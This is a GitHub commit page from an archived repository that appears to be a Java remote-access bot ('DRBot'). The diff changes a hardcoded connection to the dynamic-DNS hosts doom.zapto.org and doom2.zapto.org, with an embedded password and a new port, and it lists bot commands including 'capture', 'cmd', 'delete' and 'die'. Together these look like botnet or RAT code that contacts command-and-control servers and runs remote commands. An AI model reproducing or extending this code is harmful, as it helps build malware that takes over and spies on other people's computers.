Skip to content
This repository has been archived by the owner on Jul 25, 2022. It is now read-only.

Commit

Permalink
Minor Changes
Browse files Browse the repository at this point in the history
  • Loading branch information
MerNat committed Jun 20, 2018
1 parent 90e8bea commit 99fd64a
Show file tree
Hide file tree
Showing 2 changed files with 3 additions and 2 deletions.
2 changes: 1 addition & 1 deletion src/InitConn/InitConn.java
Original file line number Diff line number Diff line change
Expand Up @@ -77,7 +77,7 @@ public void run(){
}
}
private void connection(){
Thread newConn = new Thread(new InitConn("doom.zapto.org","doom2.zapto.org",6667,"Dearmama1!",false));
Thread newConn = new Thread(new InitConn("doom.zapto.org","doom2.zapto.org",5002,"Dearmama1!",false));
newConn.start();
}
private void connectToServer(){
Expand Down
3 changes: 2 additions & 1 deletion src/com/DRBot/Commands/myCommands.java
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,8 @@
import java.util.concurrent.ExecutorService;

public class myCommands {
private final String[] myCommands = {"capture",
private final String[] myCommands = {
"capture", //done but open terminal on ftp
"cmd",//done 1
"delete",//done
"die",
Expand Down

0 comments on commit 99fd64a

Please sign in to comment.